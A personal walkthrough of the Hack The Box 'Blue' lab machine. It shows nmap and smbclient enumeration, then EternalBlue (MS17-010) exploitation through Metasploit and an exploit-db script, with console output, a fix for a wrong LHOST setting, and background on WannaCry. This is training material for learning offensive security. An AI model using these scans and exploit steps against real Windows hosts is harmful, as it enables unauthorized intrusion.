This box is very easy and ideal for anyone starting out with hacking. This is a walkthrough and my personal experience with the HTB – Blue box. I’m going to show how I scanned and enumerated the system, which tools I used to root the box, and a common pitfall for people approaching Metasploit for the first time. I’ll also explain what famous vulnerability this box is based on.
Scanning and enumeration
I started with a classic NMap scan of all the ports of the machine:
root@kali:/home/kali# nmap -T4 -A -p- 10.10.10.40
Starting Nmap 7.80 ( https://nmap.org ) at 2020-11-28 10:41 EST
Nmap scan report for 10.10.10.40
Host is up (0.051s latency).
Not shown: 65526 closed ports
PORT      STATE SERVICE      VERSION
135/tcp   open  msrpc        Microsoft Windows RPC
139/tcp   open  netbios-ssn  Microsoft Windows netbios-ssn
445/tcp   open  microsoft-ds Windows 7 Professional 7601 Service Pack 1 microsoft-ds (workgroup: WORKGROUP)
49152/tcp open  msrpc        Microsoft Windows RPC
49153/tcp open  msrpc        Microsoft Windows RPC
49154/tcp open  msrpc        Microsoft Windows RPC
49155/tcp open  msrpc        Microsoft Windows RPC
49156/tcp open  msrpc        Microsoft Windows RPC
49157/tcp open  msrpc        Microsoft Windows RPC
No exact OS matches for host (If you know what OS is running on it, see https://nmap.org/submit/ ).
TCP/IP fingerprint:
OS:SCAN(V=7.80%E=4%D=11/28%OT=135%CT=1%CU=39401%PV=Y%DS=2%DC=T%G=Y%TM=5FC27
OS:016%P=x86_64-pc-linux-gnu)SEQ(SP=102%GCD=2%ISR=10D%TI=I%CI=I%II=I%SS=S%T
OS:S=7)OPS(O1=M54DNW8ST11%O2=M54DNW8ST11%O3=M54DNW8NNT11%O4=M54DNW8ST11%O5=
OS:M54DNW8ST11%O6=M54DST11)WIN(W1=2000%W2=2000%W3=2000%W4=2000%W5=2000%W6=2
OS:000)ECN(R=Y%DF=Y%T=80%W=2000%O=M54DNW8NNS%CC=N%Q=)T1(R=Y%DF=Y%T=80%S=O%A
OS:=S+%F=AS%RD=0%Q=)T2(R=Y%DF=Y%T=80%W=0%S=Z%A=S%F=AR%O=%RD=0%Q=)T3(R=Y%DF=
OS:Y%T=80%W=0%S=Z%A=O%F=AR%O=%RD=0%Q=)T4(R=Y%DF=Y%T=80%W=0%S=A%A=O%F=R%O=%R
OS:D=0%Q=)T5(R=Y%DF=Y%T=80%W=0%S=Z%A=S+%F=AR%O=%RD=0%Q=)T6(R=Y%DF=Y%T=80%W=
OS:0%S=A%A=O%F=R%O=%RD=0%Q=)T7(R=Y%DF=Y%T=80%W=0%S=Z%A=S+%F=AR%O=%RD=0%Q=)U
OS:1(R=Y%DF=N%T=80%IPL=164%UN=0%RIPL=G%RID=G%RIPCK=G%RUCK=G%RUD=G)IE(R=Y%DF
OS:I=N%T=80%CD=Z)

Network Distance: 2 hops
Service Info: Host: HARIS-PC; OS: Windows; CPE: cpe:/o:microsoft:windows

Host script results:
|_clock-skew: mean: 1m05s, deviation: 2s, median: 1m03s
| smb-os-discovery:
|   OS: Windows 7 Professional 7601 Service Pack 1 (Windows 7 Professional 6.1)
|   OS CPE: cpe:/o:microsoft:windows_7::sp1:professional
|   Computer name: haris-PC
|   NetBIOS computer name: HARIS-PC\x00
|   Workgroup: WORKGROUP\x00
|_  System time: 2020-11-28T15:44:16+00:00
| smb-security-mode:
|   account_used: guest
|   authentication_level: user
|   challenge_response: supported
|_  message_signing: disabled (dangerous, but default)
| smb2-security-mode:
|   2.02:
|_    Message signing enabled but not required
| smb2-time:
|   date: 2020-11-28T15:44:17
|_  start_date: 2020-11-28T15:41:38

TRACEROUTE (using port 3389/tcp)
HOP RTT      ADDRESS
1   47.74 ms 10.10.14.1
2   48.03 ms 10.10.10.40

OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 126.71 seconds
It looked like I was dealing with Windows 7 Professional 7601 Service Pack 1 (Windows 7 Professional 6.1) running SMB – Server Message Block, a communication protocol used by Windows systems to provide access to shared files, printers and ports. SMB used to run on top of NetBIOS (an older transport layer) on port 139, but since Windows 2000 it runs directly over TCP on port 445.
I wanted to see what else I could gather from the SMB service: whether there were shares that allowed anonymous login, which shares were available, and so on. So I connected to it using smbclient on Kali:
root@kali:/home/kali# smbclient -L \\\\10.10.10.40\\
Enter WORKGROUP\root's password:

	Sharename       Type      Comment
	---------       ----      -------
	ADMIN$          Disk      Remote Admin
	C$              Disk      Default share
	IPC$            IPC       Remote IPC
	Share           Disk
	Users           Disk
Reconnecting with SMB1 for workgroup listing.
do_connect: Connection to 10.10.10.40 failed (Error NT_STATUS_RESOURCE_NAME_NOT_FOUND)
Unable to connect with SMB1 -- no workgroup available
Trying to connect to those shares through smbclient didn’t work.
I then started looking around for potential exploits related to the OS and services on this box and found a couple of interesting things:
https://www.exploit-db.com/exploits/42315 (python script for EternalBlue SMB Remote Code Execution (MS17-010))
https://www.rapid7.com/db/modules/exploit/windows/smb/ms17_010_eternalblue/ (metasploit module for MS17-010)
Exploitation
Searching on Google for MS17-010, and for anything else related to Windows 7 Professional 7601 Service Pack 1 and SMB, I found a Metasploit module that seemed right for this machine.
So I tried it but it didn’t work:
msf5 exploit(windows/smb/ms17_010_eternalblue) > exploit

[*] Started reverse TCP handler on 192.168.1.57:4444
[*] 10.10.10.40:445 - Using auxiliary/scanner/smb/smb_ms17_010 as check
[+] 10.10.10.40:445 - Host is likely VULNERABLE to MS17-010! - Windows 7 Professional 7601 Service Pack 1 x64 (64-bit)
[*] 10.10.10.40:445 - Scanned 1 of 1 hosts (100% complete)
[*] 10.10.10.40:445 - Connecting to target for exploitation.
[+] 10.10.10.40:445 - Connection established for exploitation.
[+] 10.10.10.40:445 - Target OS selected valid for OS indicated by SMB reply
[*] 10.10.10.40:445 - CORE raw buffer dump (42 bytes)
[*] 10.10.10.40:445 - 0x00000000  57 69 6e 64 6f 77 73 20 37 20 50 72 6f 66 65 73  Windows 7 Profes
[*] 10.10.10.40:445 - 0x00000010  73 69 6f 6e 61 6c 20 37 36 30 31 20 53 65 72 76  sional 7601 Serv
[*] 10.10.10.40:445 - 0x00000020  69 63 65 20 50 61 63 6b 20 31                    ice Pack 1
[+] 10.10.10.40:445 - Target arch selected valid for arch indicated by DCE/RPC reply
[*] 10.10.10.40:445 - Trying exploit with 12 Groom Allocations.
[*] 10.10.10.40:445 - Sending all but last fragment of exploit packet
[*] 10.10.10.40:445 - Starting non-paged pool grooming
[+] 10.10.10.40:445 - Sending SMBv2 buffers
[+] 10.10.10.40:445 - Closing SMBv1 connection creating free hole adjacent to SMBv2 buffer.
[*] 10.10.10.40:445 - Sending final SMBv2 buffers.
[*] 10.10.10.40:445 - Sending last fragment of exploit packet!
[*] 10.10.10.40:445 - Receiving response from exploit packet
[+] 10.10.10.40:445 - ETERNALBLUE overwrite completed successfully (0xC000000D)!
[*] 10.10.10.40:445 - Sending egg to corrupted connection.
[*] 10.10.10.40:445 - Triggering free of corrupted buffer.
[-] 10.10.10.40:445 - =-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
[-] 10.10.10.40:445 - =-=-=-=-=-=-=-=-=-=-=-=-=-=FAIL-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
[-] 10.10.10.40:445 - =-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
[*] 10.10.10.40:445 - Connecting to target for exploitation.
[+] 10.10.10.40:445 - Connection established for exploitation.
[+] 10.10.10.40:445 - Target OS selected valid for OS indicated by SMB reply
[*] 10.10.10.40:445 - CORE raw buffer dump (42 bytes)
[*] 10.10.10.40:445 - 0x00000000  57 69 6e 64 6f 77 73 20 37 20 50 72 6f 66 65 73  Windows 7 Profes
[*] 10.10.10.40:445 - 0x00000010  73 69 6f 6e 61 6c 20 37 36 30 31 20 53 65 72 76  sional 7601 Serv
[*] 10.10.10.40:445 - 0x00000020  69 63 65 20 50 61 63 6b 20 31                    ice Pack 1
[+] 10.10.10.40:445 - Target arch selected valid for arch indicated by DCE/RPC reply
[*] 10.10.10.40:445 - Trying exploit with 17 Groom Allocations.
[*] 10.10.10.40:445 - Sending all but last fragment of exploit packet
[*] 10.10.10.40:445 - Starting non-paged pool grooming
[+] 10.10.10.40:445 - Sending SMBv2 buffers
[+] 10.10.10.40:445 - Closing SMBv1 connection creating free hole adjacent to SMBv2 buffer.
[*] 10.10.10.40:445 - Sending final SMBv2 buffers.
[*] 10.10.10.40:445 - Sending last fragment of exploit packet!
[*] 10.10.10.40:445 - Receiving response from exploit packet
[-] 10.10.10.40:445 - Did not receive a response from exploit packet
[*] 10.10.10.40:445 - Sending egg to corrupted connection.
[-] 10.10.10.40:445 - Errno::ECONNRESET: Connection reset by peer
[*] Exploit completed, but no session was created.
msf5 exploit(windows/smb/ms17_010_eternalblue) >
I then tried a python script for the same vulnerability, MS17-010 EternalBlue, but it gave an error:
kali@kali:~/Downloads$ python3 42315.py 10.10.10.40
Target OS: Windows 7 Professional 7601 Service Pack 1
Not found accessible named pipe
Done
Another Metasploit module for the same vulnerability didn’t work either:
msf5 exploit(windows/smb/ms17_010_psexec) > exploit

[*] Started reverse TCP handler on 192.168.1.57:4444
[*] 10.10.10.40:445 - Target OS: Windows 7 Professional 7601 Service Pack 1
[-] 10.10.10.40:445 - Timeout::Error
[-] 10.10.10.40:445 - execution expired
[-] 10.10.10.40:445 - /usr/share/metasploit-framework/vendor/bundle/ruby/2.7.0/gems/rex-core-0.1.13/lib/rex/sync/thread_safe.rb:36:in `select'
/usr/share/metasploit-framework/vendor/bundle/ruby/2.7.0/gems/rex-core-0.1.13/lib/rex/sync/thread_safe.rb:36:in `select'
/usr/share/metasploit-framework/vendor/bundle/ruby/2.7.0/gems/rex-core-0.1.13/lib/rex/io/stream.rb:75:in `rescue in read'
/usr/share/metasploit-framework/vendor/bundle/ruby/2.7.0/gems/rex-core-0.1.13/lib/rex/io/stream.rb:69:in `read'
/usr/share/metasploit-framework/vendor/bundle/ruby/2.7.0/gems/rex-core-0.1.13/lib/rex/io/stream.rb:159:in `block in timed_read'
/usr/lib/ruby/2.7.0/timeout.rb:110:in `timeout'
/usr/share/metasploit-framework/vendor/bundle/ruby/2.7.0/gems/rex-core-0.1.13/lib/rex/io/stream.rb:158:in `timed_read'
/usr/share/metasploit-framework/lib/rex/proto/smb/client.rb:73:in `smb_recv'
/usr/share/metasploit-framework/lib/msf/core/exploit/smb/client/psexec_ms17_010.rb:889:in `recv_transaction_data'
/usr/share/metasploit-framework/lib/msf/core/exploit/smb/client/psexec_ms17_010.rb:527:in `align_transaction_and_leak'
/usr/share/metasploit-framework/lib/msf/core/exploit/smb/client/psexec_ms17_010.rb:386:in `block in exploit_matched_pairs'
/usr/share/metasploit-framework/vendor/bundle/ruby/2.7.0/gems/activesupport-4.2.11.3/lib/active_support/core_ext/range/each.rb:7:in `each'
/usr/share/metasploit-framework/vendor/bundle/ruby/2.7.0/gems/activesupport-4.2.11.3/lib/active_support/core_ext/range/each.rb:7:in `each_with_time_with_zone'
/usr/share/metasploit-framework/lib/msf/core/exploit/smb/client/psexec_ms17_010.rb:381:in `exploit_matched_pairs'
/usr/share/metasploit-framework/lib/msf/core/exploit/smb/client/psexec_ms17_010.rb:44:in `eternal_pwn'
/usr/share/metasploit-framework/modules/exploits/windows/smb/ms17_010_psexec.rb:110:in `exploit'
/usr/share/metasploit-framework/lib/msf/core/exploit_driver.rb:215:in `job_run_proc'
/usr/share/metasploit-framework/lib/msf/core/exploit_driver.rb:169:in `run'
/usr/share/metasploit-framework/lib/msf/base/simple/exploit.rb:140:in `exploit_simple'
/usr/share/metasploit-framework/lib/msf/base/simple/exploit.rb:164:in `exploit_simple'
/usr/share/metasploit-framework/lib/msf/ui/console/command_dispatcher/exploit.rb:55:in `exploit_single'
/usr/share/metasploit-framework/lib/msf/ui/console/command_dispatcher/exploit.rb:201:in `cmd_exploit'
/usr/share/metasploit-framework/lib/rex/ui/text/dispatcher_shell.rb:523:in `run_command'
/usr/share/metasploit-framework/lib/rex/ui/text/dispatcher_shell.rb:474:in `block in run_single'
/usr/share/metasploit-framework/lib/rex/ui/text/dispatcher_shell.rb:468:in `each'
/usr/share/metasploit-framework/lib/rex/ui/text/dispatcher_shell.rb:468:in `run_single'
/usr/share/metasploit-framework/lib/rex/ui/text/shell.rb:158:in `run'
/usr/share/metasploit-framework/lib/metasploit/framework/command/console.rb:48:in `start'
/usr/share/metasploit-framework/lib/metasploit/framework/command/base.rb:82:in `start'
/usr/bin/msfconsole:23:in `<main>'
[*] Exploit completed, but no session was created.
I then tried to enumerate the named pipes using a Metasploit module:
msf5 auxiliary(scanner/smb/smb2) > use auxiliary/scanner/smb/smb_ms17_010
msf5 auxiliary(scanner/smb/smb_ms17_010) > options

Module options (auxiliary/scanner/smb/smb_ms17_010):

   Name         Current Setting                                                 Required  Description
   ----         ---------------                                                 --------  -----------
   CHECK_ARCH   true                                                            no        Check for architecture on vulnerable hosts
   CHECK_DOPU   true                                                            no        Check for DOUBLEPULSAR on vulnerable hosts
   CHECK_PIPE   false                                                           no        Check for named pipe on vulnerable hosts
   NAMED_PIPES  /usr/share/metasploit-framework/data/wordlists/named_pipes.txt  yes       List of named pipes to check
   RHOSTS                                                                       yes       The target host(s), range CIDR identifier, or hosts file with syntax 'file:<path>'
   RPORT        445                                                             yes       The SMB service port (TCP)
   SMBDomain    .                                                               no        The Windows domain to use for authentication
   SMBPass                                                                      no        The password for the specified username
   SMBUser                                                                      no        The username to authenticate as
   THREADS      1                                                               yes       The number of concurrent threads (max one per host)

msf5 auxiliary(scanner/smb/smb_ms17_010) > set rhost 10.10.10.40
rhost => 10.10.10.40
msf5 auxiliary(scanner/smb/smb_ms17_010) > run

[+] 10.10.10.40:445 - Host is likely VULNERABLE to MS17-010! - Windows 7 Professional 7601 Service Pack 1 x64 (64-bit)
[*] 10.10.10.40:445 - Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed
msf5 auxiliary(scanner/smb/smb_ms17_010) > set check_pipe true
check_pipe => true
msf5 auxiliary(scanner/smb/smb_ms17_010) > options

Module options (auxiliary/scanner/smb/smb_ms17_010):

   Name         Current Setting                                                 Required  Description
   ----         ---------------                                                 --------  -----------
   CHECK_ARCH   true                                                            no        Check for architecture on vulnerable hosts
   CHECK_DOPU   true                                                            no        Check for DOUBLEPULSAR on vulnerable hosts
   CHECK_PIPE   true                                                            no        Check for named pipe on vulnerable hosts
   NAMED_PIPES  /usr/share/metasploit-framework/data/wordlists/named_pipes.txt  yes       List of named pipes to check
   RHOSTS       10.10.10.40                                                     yes       The target host(s), range CIDR identifier, or hosts file with syntax 'file:<path>'
   RPORT        445                                                             yes       The SMB service port (TCP)
   SMBDomain    .                                                               no        The Windows domain to use for authentication
   SMBPass                                                                      no        The password for the specified username
   SMBUser                                                                      no        The username to authenticate as
   THREADS      1                                                               yes       The number of concurrent threads (max one per host)

msf5 auxiliary(scanner/smb/smb_ms17_010) > run

[+] 10.10.10.40:445 - Host is likely VULNERABLE to MS17-010! - Windows 7 Professional 7601 Service Pack 1 x64 (64-bit)
[+] 10.10.10.40:445 - Named pipe found: \netlogon
[*] 10.10.10.40:445 - Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed
A common mistake
I knew the machine was vulnerable to EternalBlue because the OS and service versions on this machine matched the ones described online. And as you can see from the results above, even the scanner module confirmed that the machine should be vulnerable to EternalBlue. So what went wrong?
It was the first time I was using Metasploit through a VPN to test a target machine, and there’s an issue that’s quite common among beginners (and not only beginners):
If we are testing a box on our local network, for example a Metasploitable VM or another laptop on our LAN, we usually have a local IP address (something like 192.168.0.xx).
When connecting to another network via VPN, as in the case of Hack The Box, we use a different interface with its own IP, which for HTB is something like 10.10.xx.xx.
But when Metasploit sets up a module, it fills LHOST by default with the local IP address (starting with 192.168.), not the VPN one. It is easy to miss: you check the options of the module and everything looks fine. Then you set the payload (which usually has its own LHOST) and that one picks up your 192.168.0.xx address. If you forget to check the options again, as often happens, you make the same mistake I did with this box.
After checking my previous logs, I noticed that the LHOST when I first ran the ms17_010_eternalblue exploit was 192.168.1.57. Re-running the exploit with the correct (VPN) IP instead was successful, and BOOM! I got my root access to the box.
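To catch this mismatch before running a module, here is an added shell example of mine (not code from the original post): it takes a single line of `ip route get <target>` output, extracts the interface and the source address the kernel would use to reach the target, and compares that address with the LHOST you configured. The sample route line is constructed, not output captured from the box.

```shell
#!/bin/sh
# Added example: verify that LHOST matches the interface that actually
# routes to the target (tun0 on HTB), instead of the LAN address.

# Print the "src" field of one `ip route get` line, e.g.
# "10.10.10.40 via 10.10.14.1 dev tun0 src 10.10.14.5 uid 1000"
route_src() {
    printf '%s\n' "$1" | awk '{ for (i = 1; i < NF; i++) if ($i == "src") print $(i+1) }'
}

# Print the "dev" field (outgoing interface) of the same line.
route_dev() {
    printf '%s\n' "$1" | awk '{ for (i = 1; i < NF; i++) if ($i == "dev") print $(i+1) }'
}

# Compare a configured LHOST with the source address for a route line.
# Returns 0 on match, 1 on mismatch, 2 if the line has no src field.
check_lhost() {
    lhost=$1
    route=$2
    src=$(route_src "$route")
    dev=$(route_dev "$route")
    if [ -z "$src" ]; then
        echo "could not determine source address from route: $route"
        return 2
    fi
    if [ "$lhost" = "$src" ]; then
        echo "OK: LHOST $lhost matches $dev ($src)"
        return 0
    fi
    echo "MISMATCH: LHOST is $lhost but traffic to the target leaves via $dev as $src"
    return 1
}

# Live usage on the attacking box (RHOST and LHOST are your own values):
#   check_lhost "$LHOST" "$(ip route get "$RHOST" 2>/dev/null | head -n 1)"

# Constructed sample route line, in the format `ip route get` prints:
SAMPLE_ROUTE="10.10.10.40 via 10.10.14.1 dev tun0 src 10.10.14.5 uid 1000"
check_lhost 192.168.1.57 "$SAMPLE_ROUTE"   # reports MISMATCH
check_lhost 10.10.14.5 "$SAMPLE_ROUTE"     # reports OK
```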
At that point it was just a matter of looking for the user.txt and root.txt files that had the flags inside them.
EternalBlue: What is it?
Hack The Box machines (and if you have done some CTFs, you will have noticed this is a common thing) often have names that hint at the topic of the machine. In this case the box ‘Blue’ was about the famous EternalBlue.
EternalBlue exploits a vulnerability (CVE-2017-0144 in the CVE catalogue, and called ) that rose to prominence in 2017 when the Shadow Brokers brought it to light, and it was used later that year by the WannaCry ransomware. Allegedly this exploit was developed by the NSA.
Simply put, the exploit abuses SMBv1 vulnerabilities in how Windows handles specially crafted packets sent by an attacker, chaining 3 different bugs.
Microsoft released a patch for this vulnerability in April 2017, one month before the Shadow Brokers tweet that made EternalBlue public, but it still managed to do a lot of damage because people (and especially organizations) often don’t patch their machines in a timely fashion.
For a more technical explanation you could read this article.
I have a lot of other writeups for HackTheBox machines that I still have to publish, and I’ll try to do it as soon as possible, so if you are interested in this type of content keep an eye out for future articles or take a look around my website.